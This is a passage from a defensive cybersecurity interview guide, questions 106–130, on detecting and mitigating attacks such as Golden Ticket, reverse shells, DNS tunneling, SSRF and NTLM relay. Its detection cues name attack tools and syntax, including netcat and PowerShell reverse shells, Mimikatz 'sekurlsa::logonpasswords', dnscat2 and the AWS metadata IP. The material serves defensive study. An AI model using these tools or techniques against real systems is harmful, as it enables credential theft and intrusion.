106. What is a Golden Ticket attack, and how do you detect it?

Answer:

Attackers forge a Kerberos TGT (Ticket Granting Ticket) with Domain Admin rights.
Detection:
Monitor for Event ID 4769 (TGS requests with unusual lifetimes).
Detect logins using non-expiring Kerberos tickets.
Mitigation:
Rotate krbtgt account password twice.
Implement Managed Service Accounts (MSAs) instead of regular accounts.

107. How do you detect a Reverse Shell attack?

Answer:

Reverse shells allow attackers to remotely control compromised hosts.

Detection:
Look for processes spawning network connections to external IPs.
Monitor for netcat (nc), PowerShell (Invoke-WebRequest), or Python reverse shell
scripts.
Mitigation:
Block outbound connections to uncommon ports.
Implement Application Control to prevent unauthorized script execution.

108. What is a Golden GMSA attack?

Answer:

Attackers compromise Group Managed Service Accounts (gMSA) to persist in AD.

Detection:
Look for unauthorized access to gMSA credentials in LSASS memory.
Monitor for gMSA credential access using Mimikatz (sekurlsa::logonpasswords).
 Mitigation:
Restrict gMSA access to specific applications only.
Use LSA protection (RunAsPPL) to prevent credential dumping.

109. What is a Web Cache Deception attack?

Answer:

Attackers trick web caches into storing sensitive user data.

Detection:
Look for cached responses containing session tokens or credentials.
Monitor for anomalous URL patterns with sensitive data.
Mitigation:
Disable caching for authentication-related endpoints.
Use HTTP response headers like Cache-Control: no-store.

110. How do you detect DNS Tunneling?

Answer:

Attackers use DNS queries to exfiltrate data.

Detection:
Look for DNS requests with unusually long subdomains.
Monitor for high-frequency DNS queries to unknown domains.
Mitigation:
Block known DNS tunneling tools (iodine, dnscat2).
Implement machine learning-based anomaly detection.

111. What is an HTML Smuggling attack, and how do you detect it?

Answer:

Attackers deliver malicious payloads via encoded JavaScript inside HTML files.
Detection:
Look for downloads of .html files containing atob() or Blob() functions.
Monitor for encoded JavaScript constructing binary payloads.
Mitigation:
Block HTML attachments in emails.
Use browser security policies (Content Security Policy - CSP).

112. What is a Container Escape attack, and how do you detect it?

Answer:

Attackers break out of Docker or Kubernetes containers to access the host system.
Detection:
Monitor for containerized processes accessing host namespaces (/proc/self/ns/mnt).
Look for privileged container executions (--privileged flag).
Mitigation:
 Use seccomp and AppArmor policies.
Implement runtime security tools like Falco or Aqua Security.

113. How do you detect an Evil Twin attack?

Answer:

Attackers set up rogue Wi-Fi access points to steal credentials.

Detection:
Look for duplicate SSIDs with different MAC addresses.
Monitor for unexpected WPA2 Enterprise authentication requests.
Mitigation:
Use certificate-based authentication for Wi-Fi (EAP-TLS).
Implement Wi-Fi IDS/IPS solutions.

114. How do you investigate a Windows Defender exclusion bypass?

Answer:

Attackers add exclusions in Windows Defender to avoid detection.

Detection:
Look for registry modifications at HKLM\SOFTWARE\Microsoft\Windows
Defender\Exclusions.
Detect Event ID 5007 (Windows Defender configuration changes).
Mitigation:
Monitor Defender settings using Group Policy Preferences.
Implement Windows Defender Tamper Protection.

115. How do you detect a USB Rubber Ducky attack?

Answer:

Attackers use malicious USB devices that execute keystroke injections.

Detection:
Look for new HID (Human Interface Device) registrations in Event Logs.
Detect script execution immediately after USB insertion.
Mitigation:
Disable USB autorun policies.
Use endpoint protection to block unauthorized USB devices.

116. How do you detect an MFA Fatigue Attack?

Answer:
 Attackers spam the victim with continuous MFA push notifications until they approve
one.
Detection:
Look for multiple failed MFA requests within a short time.
Monitor MFA approvals from unusual locations or times.
Mitigation:
Implement MFA number matching to prevent accidental approvals.
Use phishing-resistant authentication like FIDO2 tokens.

117. What is a Shadow IT threat, and how do you detect it?

Answer:

Employees use unauthorized cloud apps that increase security risks.

Detection:
Monitor unsanctioned SaaS apps in CASB logs.
Look for data transfers to personal cloud storage (Google Drive, Dropbox).
Mitigation:
Enforce strict Cloud Access Security Broker (CASB) policies.
Use DLP (Data Loss Prevention) to block unauthorized uploads.

118. How do you detect PowerShell exploitation in an enterprise environment?

Answer:

Attackers use PowerShell for lateral movement, privilege escalation, and payload
execution.
Detection:
Monitor PowerShell execution with -EncodedCommand parameter.
Look for suspicious child processes (powershell.exe spawning cmd.exe).
Mitigation:
Enable PowerShell Constrained Language Mode.
Use Windows Defender AMSI (Antimalware Scan Interface) to detect malicious
scripts.

119. How do you analyze an infected memory dump?

Answer:

Steps:
1. Use Volatility or Rekall for memory analysis.
2. Extract suspicious processes using pslist or pstree.
3. Look for network connections using netscan.
4. Dump malicious process memory with procdump.
5. Analyze extracted malware using VirusTotal or sandboxing.

120. How do you detect a DNS Rebinding attack?

Answer:

Attackers exploit browsers to bypass same-origin policy and hijack internal networks.
Detection:
Look for rapid DNS resolution changes in a short time.
Monitor JavaScript making requests to private IP ranges.
Mitigation:
Block external DNS responses resolving to RFC 1918 private IPs.
Use browser security settings (e.g., Content Security Policy - CSP).

121. How do you detect an SSRF (Server-Side Request Forgery) attack?

Answer:

Attackers make the server send requests to internal resources.

Detection:
Look for HTTP requests to 169.254.169.254 (AWS metadata service).
Monitor internal requests originating from public-facing applications.
Mitigation:
Block internal IP ranges from being accessed externally.
Implement allowlists instead of blacklists for outbound requests.

122. How do you investigate an LLMNR/NBT-NS poisoning attack?

Answer:

Attackers intercept Windows name resolution traffic to steal NTLM hashes.

Detection:
Look for sudden spikes in LLMNR/NBT-NS traffic (UDP 5355, UDP 137).
Check if Responder tool is running (responder.py).
Mitigation:
Disable LLMNR and NBT-NS via Group Policy.
Enforce SMB signing and NTLM relay protection.

123. How do you investigate an attack on AWS S3 buckets?

Answer:

Detection:
Look for CloudTrail logs showing PutObjectAcl or ListBuckets operations from
unknown IPs.
Monitor public S3 bucket access changes.
Mitigation:
Enforce S3 Bucket Policies to deny public access.
Enable AWS Macie for data classification and anomaly detection.

124. How do you detect an NTLM Relay Attack?

Answer:
 Attackers relay captured NTLM authentication to access SMB or LDAP.
Detection:
Look for SMB authentication attempts from unauthorized hosts.
Monitor for Event ID 4624 (Type 3 logins with NTLM authentication).
Mitigation:
Enforce SMB signing and Extended Protection for Authentication (EPA).
Block NTLM authentication over LDAP.

125. What is BEC (Business Email Compromise), and how do you detect it?

Answer:

Attackers impersonate executives via phishing to trick employees into making

fraudulent transactions.
Detection:
Look for email header anomalies (e.g., Reply-To address different from From
address).
Monitor for keywords like "urgent," "payment," or "wire transfer" in emails.
Mitigation:
Enforce DMARC, DKIM, and SPF to block spoofed emails.
Implement user training and phishing simulations.

126. How do you detect a BadUSB attack?

Answer:

Attackers use malicious USB devices that act as keyboards or network adapters.
Detection:
Look for new HID devices registered as keyboards (Event ID 6416).
Detect sudden script execution immediately after USB insertion.
Mitigation:
Disable USB autorun policies.
Use USB whitelisting and endpoint protection.

127. How do you investigate an Azure AD brute-force attack?

Answer:

Detection:
Look for Azure Sign-in logs showing multiple failed attempts from different locations.
Monitor suspicious logins bypassing MFA.
Mitigation:
Implement Conditional Access Policies.
Use Azure Identity Protection to detect risky sign-ins.

128. What is a Kubernetes RBAC attack, and how do you detect it?

Answer:
 Attackers exploit weak Kubernetes Role-Based Access Control (RBAC) configurations.
Detection:
Look for Service Account tokens being used from unexpected IPs.
Monitor for privilege escalation attempts using kubectl auth can-i.
Mitigation:
Follow least privilege principle for Kubernetes RBAC policies.
Regularly audit Kubernetes RoleBindings and ClusterRoles.

129. How do you detect a Fast Flux botnet?

Answer:

Attackers rapidly change DNS records to evade detection.

Detection:
Look for frequent DNS resolution changes for the same domain.
Monitor multiple IP addresses being associated with a single domain in a short time.
Mitigation:
Use DNS filtering and threat intelligence feeds.
Block known Fast Flux domains at the firewall level.

130. How do you investigate a Google Workspace account takeover?

Answer:

Detection:
Look for Google Admin log events showing password resets or MFA changes.
Monitor OAuth token grants to unknown third-party apps.
Mitigation:
Enforce OAuth app whitelisting.
Require hardware-based MFA (Titan Security Keys).